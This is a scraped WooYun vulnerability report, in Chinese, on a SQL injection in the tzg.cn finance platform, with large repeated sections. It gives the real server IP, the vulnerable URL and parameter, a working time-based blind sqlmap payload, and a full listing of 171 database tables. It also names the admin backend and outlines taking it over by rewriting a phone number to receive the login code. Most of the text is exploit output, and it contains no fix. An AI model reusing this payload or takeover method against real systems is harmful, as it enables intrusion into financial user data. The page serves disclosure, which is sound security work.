金融安全之铜掌柜root权限SQL注入漏洞涉及171个表

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168437

漏洞标题：金融安全之铜掌柜root权限SQL注入漏洞涉及171个表

漏洞作者：路人甲

提交时间：2016-01-08 15:49

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-08：细节已通知厂商并且等待厂商处理中
2016-01-08：厂商已经确认，细节仅向厂商公开
2016-01-18：细节向核心白帽子及相关领域专家公开
2016-01-28：细节向普通白帽子公开
2016-02-07：细节向实习白帽子公开
2016-02-22：细节向公众公开

简要描述：

注入啊注入，看前人提交注入说未复现，不知道厂商是不会还是怎么的，如果还不能复现可以私信我

详细说明：

http://122.224.156.194:9090/daikuantouzi?rateEnd=10&rateBegin=0&istate=10&pageIndex=11
istate参数存在注入

root权限，泄漏171个表。用户数据达数十万

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: istate (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: rateEnd=10&rateBegin=0&istate=10) AND (SELECT * FROM (SELECT(SLEEP(5)))CZjr) AND (9985=9985&pageIndex=11
---
back-end DBMS: MySQL 5.0.12
Database: tzg
[171 tables]
+---------------------------------+
| batch_job_execution             |
| batch_job_execution_context     |
| batch_job_execution_params      |
| batch_job_execution_seq         |
| batch_job_instance              |
| batch_job_params                |
| batch_job_seq                   |
| batch_step_execution            |
| batch_step_execution_context    |
| batch_step_execution_seq        |
| tbaccounttoken                  |
| tbactive                        |
| tbactivechance                  |
| tbactivepraise                  |
| tbactivereward                  |
| tbactiverewardrecord            |
| tbactiverewardsend              |
| tbactivesignrecord              |
| tbadvancecompany                |
| tbadvancedfinancialaudit        |
| tbadvancefinancialauditflow     |
| tbapprovalflow                  |
| tbapprovalrating                |
| tbappversion                    |
| tbappwelcomeimage               |
| tbareainfo                      |
| tbattachcataloglist             |
| tbauditinformation              |
| tbautoinvest                    |
| tbawardsaccount                 |
| tbawardsapply                   |
| tbawardsapplyflow               |
| tbawardscdkey                   |
| tbawardsdisplay                 |
| tbawardsgrant                   |
| tbawardsrule                    |
| tbawardsused                    |
| tbbankcashmanage                |
| tbbankinfo                      |
| tbbankpaymanage                 |
| tbbindbankcard                  |
| tbborroweraccount               |
| tbborrowrecord                  |
| tbcash                          |
| tbcerifycataloglist             |
| tbcerifycatalogtype             |
| tbchannel                       |
| tbcommunity                     |
| tbcompanyfinancialaudit         |
| tbcompanyfinancialauditflow     |
| tbconsoleloginaccount           |
| tbcontracttemplate              |
| tbcreditaccount                 |
| tbcreditconsumerecord           |
| tbcreditinvestrecord            |
| tbcreditrefundrecord            |
| tbcreditrepayrecord             |
| tbcustomservicetrack            |
| tbdayinvest                     |
| tbemailmanage                   |
| tbemailrecord                   |
| tbemailsend                     |
| tbexperiencesubject             |
| tbexperiencesubjectinvestrecord |
| tbexperiencesubjectrepayrecord  |
| tbfbaba                         |
| tbfinancialauditflow            |
| tbfinancialcash                 |
| tbfinancialcashfailure          |
| tbfinancialmakeup               |
| tbfinancialrecord               |
| tbfinancialrepay                |
| tbfinancing                     |
| tbfixedbaodialyoverview         |
| tbfixedbaoinvestrecord          |
| tbfixedbaoproject               |
| tbfixedbaoprojectdetail         |
| tbfixedbaorepayrecord           |
| tbfixedbaosubject               |
| tbfocus                         |
| tbfriendlylink                  |
| tbguarantee                     |
| tbguaranteeaccount              |
| tbhelpcategy                    |
| tbhelpdetail                    |
| tbinstitution                   |
| tbinvestcompany                 |
| tbinvesteraccount               |
| tbinvestrecord                  |
| tbinvestrepayrecord             |
| tbllpaycard                     |
| tbllpaycash                     |
| tbllpayproject                  |
| tbllpayprojecttransfer          |
| tbllpayregister                 |
| tbloginaccount                  |
| tbloginaccountaudit             |
| tbloginaccountauditflow         |
| tbloginchannelactivityreward    |
| tbloginchannelmiactive          |
| tbloginchannelotheractive       |
| tbmediareports                  |
| tbmessage                       |
| tbmessagemanage                 |
| tbmessagesubscriptions          |
| tbmessagesubscriptionshistory   |
| tbmsmsrecord                    |
| tbmsmssend                      |
| tbnews                          |
| tbnotice                        |
| tbpersonalrole                  |
| tbplatformaccount               |
| tbproject                       |
| tbprojectattach                 |
| tbprojectcataloglist            |
| tbprojectcategy                 |
| tbprojectsafeguard              |
| tbprojectsuggestions            |
| tbpromotechannel                |
| tbpushrecord                    |
| tbrecharge                      |
| tbrecommendrecords              |
| tbredapply                      |
| tbredauditflow                  |
| tbredmakeup                     |
| tbredrecord                     |
| tbredrule                       |
| tbregistemessage                |
| tbrepayrecord                   |
| tbreport001                     |
| tbreport002                     |
| tbreport003                     |
| tbreport004                     |
| tbreport005                     |
| tbreport006                     |
| tbreport007                     |
| tbreport008                     |
| tbreport009                     |
| tbreport010                     |
| tbreport011                     |
| tbreport012                     |
| tbreport013                     |
| tbreport014                     |
| tbreport015                     |
| tbreport016                     |
| tbreport018                     |
| tbreport019                     |
| tbreport020                     |
| tbreport900                     |
| tbreportaward                   |
| tbreportborroweraccount         |
| tbreportdis                     |
| tbreportinvestaccount           |
| tbreportplatformaccount         |
| tbreportreserveaccount          |
| tbreserveaccount                |
| tbresource                      |
| tbriskenterprise                |
| tbriskpersonal                  |
| tbroleinfo                      |
| tbroleresource                  |
| tbsafeguardmeasures             |
| tbsmsmanage                     |
| tbsmsrecord                     |
| tbsmssend                       |
| tbsmstemplate                   |
| tbsmswhitelist                  |
| tbsubject                       |
| tbsubjectplan                   |
| tbsystemparam                   |
| tbuploadfile                    |
+---------------------------------+

还有后台http://122.224.156.194:82/
还得需要手机验证码，利用注入是可以改掉手机号接验证码进后台的，我就布试了

漏洞证明：

http://122.224.156.194:9090/daikuantouzi?rateEnd=10&rateBegin=0&istate=10&pageIndex=11
istate参数存在注入

root权限，泄漏171个表。用户数据达数十万

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: istate (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: rateEnd=10&rateBegin=0&istate=10) AND (SELECT * FROM (SELECT(SLEEP(5)))CZjr) AND (9985=9985&pageIndex=11
---
back-end DBMS: MySQL 5.0.12
Database: tzg
[171 tables]
+---------------------------------+
| batch_job_execution             |
| batch_job_execution_context     |
| batch_job_execution_params      |
| batch_job_execution_seq         |
| batch_job_instance              |
| batch_job_params                |
| batch_job_seq                   |
| batch_step_execution            |
| batch_step_execution_context    |
| batch_step_execution_seq        |
| tbaccounttoken                  |
| tbactive                        |
| tbactivechance                  |
| tbactivepraise                  |
| tbactivereward                  |
| tbactiverewardrecord            |
| tbactiverewardsend              |
| tbactivesignrecord              |
| tbadvancecompany                |
| tbadvancedfinancialaudit        |
| tbadvancefinancialauditflow     |
| tbapprovalflow                  |
| tbapprovalrating                |
| tbappversion                    |
| tbappwelcomeimage               |
| tbareainfo                      |
| tbattachcataloglist             |
| tbauditinformation              |
| tbautoinvest                    |
| tbawardsaccount                 |
| tbawardsapply                   |
| tbawardsapplyflow               |
| tbawardscdkey                   |
| tbawardsdisplay                 |
| tbawardsgrant                   |
| tbawardsrule                    |
| tbawardsused                    |
| tbbankcashmanage                |
| tbbankinfo                      |
| tbbankpaymanage                 |
| tbbindbankcard                  |
| tbborroweraccount               |
| tbborrowrecord                  |
| tbcash                          |
| tbcerifycataloglist             |
| tbcerifycatalogtype             |
| tbchannel                       |
| tbcommunity                     |
| tbcompanyfinancialaudit         |
| tbcompanyfinancialauditflow     |
| tbconsoleloginaccount           |
| tbcontracttemplate              |
| tbcreditaccount                 |
| tbcreditconsumerecord           |
| tbcreditinvestrecord            |
| tbcreditrefundrecord            |
| tbcreditrepayrecord             |
| tbcustomservicetrack            |
| tbdayinvest                     |
| tbemailmanage                   |
| tbemailrecord                   |
| tbemailsend                     |
| tbexperiencesubject             |
| tbexperiencesubjectinvestrecord |
| tbexperiencesubjectrepayrecord  |
| tbfbaba                         |
| tbfinancialauditflow            |
| tbfinancialcash                 |
| tbfinancialcashfailure          |
| tbfinancialmakeup               |
| tbfinancialrecord               |
| tbfinancialrepay                |
| tbfinancing                     |
| tbfixedbaodialyoverview         |
| tbfixedbaoinvestrecord          |
| tbfixedbaoproject               |
| tbfixedbaoprojectdetail         |
| tbfixedbaorepayrecord           |
| tbfixedbaosubject               |
| tbfocus                         |
| tbfriendlylink                  |
| tbguarantee                     |
| tbguaranteeaccount              |
| tbhelpcategy                    |
| tbhelpdetail                    |
| tbinstitution                   |
| tbinvestcompany                 |
| tbinvesteraccount               |
| tbinvestrecord                  |
| tbinvestrepayrecord             |
| tbllpaycard                     |
| tbllpaycash                     |
| tbllpayproject                  |
| tbllpayprojecttransfer          |
| tbllpayregister                 |
| tbloginaccount                  |
| tbloginaccountaudit             |
| tbloginaccountauditflow         |
| tbloginchannelactivityreward    |
| tbloginchannelmiactive          |
| tbloginchannelotheractive       |
| tbmediareports                  |
| tbmessage                       |
| tbmessagemanage                 |
| tbmessagesubscriptions          |
| tbmessagesubscriptionshistory   |
| tbmsmsrecord                    |
| tbmsmssend                      |
| tbnews                          |
| tbnotice                        |
| tbpersonalrole                  |
| tbplatformaccount               |
| tbproject                       |
| tbprojectattach                 |
| tbprojectcataloglist            |
| tbprojectcategy                 |
| tbprojectsafeguard              |
| tbprojectsuggestions            |
| tbpromotechannel                |
| tbpushrecord                    |
| tbrecharge                      |
| tbrecommendrecords              |
| tbredapply                      |
| tbredauditflow                  |
| tbredmakeup                     |
| tbredrecord                     |
| tbredrule                       |
| tbregistemessage                |
| tbrepayrecord                   |
| tbreport001                     |
| tbreport002                     |
| tbreport003                     |
| tbreport004                     |
| tbreport005                     |
| tbreport006                     |
| tbreport007                     |
| tbreport008                     |
| tbreport009                     |
| tbreport010                     |
| tbreport011                     |
| tbreport012                     |
| tbreport013                     |
| tbreport014                     |
| tbreport015                     |
| tbreport016                     |
| tbreport018                     |
| tbreport019                     |
| tbreport020                     |
| tbreport900                     |
| tbreportaward                   |
| tbreportborroweraccount         |
| tbreportdis                     |
| tbreportinvestaccount           |
| tbreportplatformaccount         |
| tbreportreserveaccount          |
| tbreserveaccount                |
| tbresource                      |
| tbriskenterprise                |
| tbriskpersonal                  |
| tbroleinfo                      |
| tbroleresource                  |
| tbsafeguardmeasures             |
| tbsmsmanage                     |
| tbsmsrecord                     |
| tbsmssend                       |
| tbsmstemplate                   |
| tbsmswhitelist                  |
| tbsubject                       |
| tbsubjectplan                   |
| tbsystemparam                   |
| tbuploadfile                    |
+---------------------------------+

还有后台http://122.224.156.194:82/
还得需要手机验证码，利用注入是可以改掉手机号接验证码进后台的，我就布试了

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-01-08 18:19

厂商回复：

感谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168437

漏洞标题：金融安全之铜掌柜root权限SQL注入漏洞涉及171个表

相关厂商：tzg.cn

漏洞作者：路人甲

提交时间：2016-01-08 15:49

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168437

漏洞标题：金融安全之铜掌柜root权限SQL注入漏洞涉及171个表

相关厂商：tzg.cn

漏洞作者： 路人甲

提交时间：2016-01-08 15:49

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0168437"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云